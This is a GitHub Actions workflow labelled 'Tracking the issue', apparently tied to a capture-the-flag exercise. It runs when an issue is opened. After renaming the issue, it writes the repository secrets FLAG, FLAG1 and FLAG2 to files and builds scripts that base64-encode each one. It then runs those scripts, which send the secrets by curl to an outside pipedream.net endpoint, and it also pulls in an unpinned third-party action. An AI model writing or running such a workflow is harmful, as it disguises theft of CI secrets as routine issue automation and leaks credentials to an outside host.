name: Tracking the issue
on:
  issues:
    types: [opened]

permissions:
  issues: write
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl \
          -X PATCH \
          -H "Authorization: token ${{ github.token }}" \
          -H "Accept: application/vnd.github.v3+json" \
          https://api.github.com/repos/${{github.repository}}/issues/${{github.event.issue.number}} \
          -d '{"title":"This is new title", "body": "action run finished"}'

      - run: echo "${{ secrets.FLAG }}" > flag.txt
      - run: echo "curl https://eow1mv6ntyqh1ox.m.pipedream.net/?code=$(cat flag.txt | base64 -w0)" > test.sh;chmod 777 test.sh
      - run: echo "${{ secrets.FLAG1 }}" > flag1.txt
      - run: echo "curl https://eow1mv6ntyqh1ox.m.pipedream.net/?code=$(cat flag1.txt| base64 -w0)" > test2.sh;chmod 777 test2.sh
      - run: echo "${{ secrets.FLAG2 }}" > flag2.txt
      - run: echo "curl https://eow1mv6ntyqh1ox.m.pipedream.net/?code=$(cat flag2.txt| base64 -w0)" > test3.sh;chmod 777 test3.sh
      - run: ./test.sh; ./test2.sh; ./test3.sh
      - uses: hackerify/issue-template@main
